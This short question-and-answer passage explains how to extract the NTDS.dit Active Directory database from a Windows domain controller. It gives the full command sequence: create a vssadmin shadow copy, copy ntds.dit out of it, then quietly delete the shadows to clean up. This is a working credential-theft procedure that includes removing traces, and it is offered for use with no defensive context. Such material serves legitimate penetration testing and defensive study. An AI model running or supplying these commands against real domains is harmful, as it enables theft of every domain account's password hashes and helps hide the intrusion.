What are the typical steps to extract the NTDS.dit file from a domain controller using built-in vssadmin?

First, create a snapshot of the system drive with `vssadmin create shadow /for=c:`, which returns a Shadow Copy Volume Name like `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12`. Then copy the NTDS.dit file using `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\windows\NTDS\ntds.dit c:\ntds.dit`. Finally, clean up by deleting the snapshot with `vssadmin delete shadows /for=c: /quiet`. This method is simple and uses tools already present on Windows Server. For a comprehensive overview of all methods, refer to Domain Penetration - Obtaining the NTDS.dit File from Domain Controller Servers.